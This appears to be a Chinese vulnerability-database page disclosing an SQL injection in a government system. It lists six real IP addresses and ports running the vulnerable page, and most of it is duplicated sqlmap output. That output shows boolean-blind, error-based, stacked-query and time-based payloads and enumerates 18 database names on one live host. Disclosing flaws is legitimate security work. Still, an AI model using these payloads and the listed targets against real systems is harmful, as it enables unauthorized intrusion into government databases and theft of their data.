|某政府系统一处SQL注入#2 - VULHUB开源网络安全威胁库

某政府系统一处SQL注入#2

- AV AC AU C I A

发布： 2025-04-13

修订： 2025-04-13

### 简要描述： RT ### 详细说明：山东农友软件公司官网:http://www.nongyou.com.cn/ 案例如下： http://222.135.76.147:8200/ckq/jwhkzjdlist.aspx?tname=宁津办事处&CountryName=所前王家 http://60.217.72.17:7117/ckq/jwhkzjdlist.aspx?tname=山头办&CountryName=河北西社区 http://218.58.124.131:8003/ckq/jwhkzjdlist.aspx?tname=综合保税物流片区&CountryName=北岭村 http://218.56.40.229:8013/ckq/jwhkzjdlist.aspx?tname=昆嵛镇&CountryName=滩上 http://218.56.99.84:8003/ckq/jwhkzjdlist.aspx?tname=昆仑镇&CountryName=河石坞村 http://222.134.154.214:8001/ckq/jwhkzjdlist.aspx?tname=大张庄镇&CountryName=胜利村 1.测试注入点:http://222.134.154.214:8001/ckq/jwhkzjdlist.aspx?tname=大张庄镇&CountryName=胜利村 [<img src="https://images.seebug.org/upload/201412/31171842ae2ea62b05c8f3c56c586622662f8b9e.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/31171842ae2ea62b05c8f3c56c586622662f8b9e.png) ``` sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --- Place: GET Parameter: tname Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY claus e (RLIKE) Payload: tname=????' RLIKE (SELECT (CASE WHEN (9506=9506) THEN CONVERT(0xe5a 4a7e5bca0e5ba84e99587 USING utf8) ELSE 0x28 END)) AND 'Jfto'='Jfto&CountryName=? ?? Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: tname=????' AND (SELECT 1011 FROM(SELECT COUNT(*),CONCAT(0x716c6263 71,(SELECT (CASE WHEN (1011=1011) THEN 1 ELSE 0 END)),0x7179687571,FLOOR(RAND(0) *2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'pobb'='pobb&Coun tryName=??? Type: stacked queries Title: MySQL > 5.0.11 stacked queries Payload: tname=????'; SELECT SLEEP(5)-- &CountryName=??? Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: tname=????' AND SLEEP(5) AND 'jMaG'='jMaG&CountryName=??? --- [17:18:08] [INFO] the back-end DBMS is MySQL web server operating system: Windows 2008 or Vista web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0 back-end DBMS: MySQL 5.0 [17:18:08] [INFO] fetching database names [17:18:13] [INFO] the SQL query used returns 658 entries [17:18:13] [INFO] retrieved: information_schema [17:18:13] [INFO] retrieved: cw_databasecomm22yiyuanxian [17:18:13] [INFO] retrieved: cw_databasecommzbyiyuanxian [17:18:13] [INFO] retrieved: cwdbcommzbyiyuanxian100012 [17:18:13] [INFO] retrieved: cwdbcommzbyiyuanxian100015 [17:18:13] [INFO] retrieved: cwdbcommzbyiyuanxian100030 [17:18:13] [INFO] retrieved: cwdbcommzbyiyuanxian100031 [17:18:13] [INFO] retrieved: cwdbcommzbyiyuanxian100041 [17:18:14] [INFO] retrieved: cwdbcommzbyiyuanxian100042 [17:18:14] [INFO] retrieved: cwdbcommzbyiyuanxian100043 [17:18:14] [INFO] retrieved: cwdbcommzbyiyuanxian100044 [17:18:14] [INFO] retrieved: cwdbcommzbyiyuanxian100046 [17:18:14] [INFO] retrieved: cwdbcommzbyiyuanxian100047 [17:18:14] [INFO] retrieved: cwdbcommzbyiyuanxian100048 [17:18:14] [INFO] retrieved: cwdbcommzbyiyuanxian100055 [17:18:14] [INFO] retrieved: cwdbcommzbyiyuanxian100060 [17:18:14] [INFO] retrieved: cwdbcommzbyiyuanxian100061 [17:18:14] [INFO] retrieved: cwdbcommzbyiyuanxian100063 [17:18:14] [WARNING] user aborted during enumeration. sqlmap will display partia l output available databases [18]: [*] cw_databasecomm22yiyuanxian [*] cw_databasecommzbyiyuanxian [*] cwdbcommzbyiyuanxian100012 [*] cwdbcommzbyiyuanxian100015 [*] cwdbcommzbyiyuanxian100030 [*] cwdbcommzbyiyuanxian100031 [*] cwdbcommzbyiyuanxian100041 [*] cwdbcommzbyiyuanxian100042 [*] cwdbcommzbyiyuanxian100043 [*] cwdbcommzbyiyuanxian100044 [*] cwdbcommzbyiyuanxian100046 [*] cwdbcommzbyiyuanxian100047 [*] cwdbcommzbyiyuanxian100048 [*] cwdbcommzbyiyuanxian100055 [*] cwdbcommzbyiyuanxian100060 [*] cwdbcommzbyiyuanxian100061 [*] cwdbcommzbyiyuanxian100063 [*] information_schema [17:18:14] [WARNING] HTTP error codes detected during run: 500 (Internal Server Error) - 19 times [17:18:14] [INFO] fetched data logged to text files under 'C:\Documents and Sett ings\Administrator\.sqlmap\output\222.134.154.214' ``` 均可复现。 ### 漏洞证明： 1.测试注入点:http://222.134.154.214:8001/ckq/jwhkzjdlist.aspx?tname=大张庄镇&CountryName=胜利村 [<img src="https://images.seebug.org/upload/201412/31171842ae2ea62b05c8f3c56c586622662f8b9e.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/31171842ae2ea62b05c8f3c56c586622662f8b9e.png) ``` sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --- Place: GET Parameter: tname Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY claus e (RLIKE) Payload: tname=????' RLIKE (SELECT (CASE WHEN (9506=9506) THEN CONVERT(0xe5a 4a7e5bca0e5ba84e99587 USING utf8) ELSE 0x28 END)) AND 'Jfto'='Jfto&CountryName=? ?? Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: tname=????' AND (SELECT 1011 FROM(SELECT COUNT(*),CONCAT(0x716c6263 71,(SELECT (CASE WHEN (1011=1011) THEN 1 ELSE 0 END)),0x7179687571,FLOOR(RAND(0) *2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'pobb'='pobb&Coun tryName=??? Type: stacked queries Title: MySQL > 5.0.11 stacked queries Payload: tname=????'; SELECT SLEEP(5)-- &CountryName=??? Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: tname=????' AND SLEEP(5) AND 'jMaG'='jMaG&CountryName=??? --- [17:18:08] [INFO] the back-end DBMS is MySQL web server operating system: Windows 2008 or Vista web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0 back-end DBMS: MySQL 5.0 [17:18:08] [INFO] fetching database names [17:18:13] [INFO] the SQL query used returns 658 entries [17:18:13] [INFO] retrieved: information_schema [17:18:13] [INFO] retrieved: cw_databasecomm22yiyuanxian [17:18:13] [INFO] retrieved: cw_databasecommzbyiyuanxian [17:18:13] [INFO] retrieved: cwdbcommzbyiyuanxian100012 [17:18:13] [INFO] retrieved: cwdbcommzbyiyuanxian100015 [17:18:13] [INFO] retrieved: cwdbcommzbyiyuanxian100030 [17:18:13] [INFO] retrieved: cwdbcommzbyiyuanxian100031 [17:18:13] [INFO] retrieved: cwdbcommzbyiyuanxian100041 [17:18:14] [INFO] retrieved: cwdbcommzbyiyuanxian100042 [17:18:14] [INFO] retrieved: cwdbcommzbyiyuanxian100043 [17:18:14] [INFO] retrieved: cwdbcommzbyiyuanxian100044 [17:18:14] [INFO] retrieved: cwdbcommzbyiyuanxian100046 [17:18:14] [INFO] retrieved: cwdbcommzbyiyuanxian100047 [17:18:14] [INFO] retrieved: cwdbcommzbyiyuanxian100048 [17:18:14] [INFO] retrieved: cwdbcommzbyiyuanxian100055 [17:18:14] [INFO] retrieved: cwdbcommzbyiyuanxian100060 [17:18:14] [INFO] retrieved: cwdbcommzbyiyuanxian100061 [17:18:14] [INFO] retrieved: cwdbcommzbyiyuanxian100063 [17:18:14] [WARNING] user aborted during enumeration. sqlmap will display partia l output available databases [18]: [*] cw_databasecomm22yiyuanxian [*] cw_databasecommzbyiyuanxian [*] cwdbcommzbyiyuanxian100012 [*] cwdbcommzbyiyuanxian100015 [*] cwdbcommzbyiyuanxian100030 [*] cwdbcommzbyiyuanxian100031 [*] cwdbcommzbyiyuanxian100041 [*] cwdbcommzbyiyuanxian100042 [*] cwdbcommzbyiyuanxian100043 [*] cwdbcommzbyiyuanxian100044 [*] cwdbcommzbyiyuanxian100046 [*] cwdbcommzbyiyuanxian100047 [*] cwdbcommzbyiyuanxian100048 [*] cwdbcommzbyiyuanxian100055 [*] cwdbcommzbyiyuanxian100060 [*] cwdbcommzbyiyuanxian100061 [*] cwdbcommzbyiyuanxian100063 [*] information_schema [17:18:14] [WARNING] HTTP error codes detected during run: 500 (Internal Server Error) - 19 times [17:18:14] [INFO] fetched data logged to text files under 'C:\Documents and Sett ings\Administrator\.sqlmap\output\222.134.154.214' ```

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息

您还没有登录，登录后可查看更多

添加资源
收藏资源
问题反馈

贡献用户

暂无贡献用户

VULHUB ™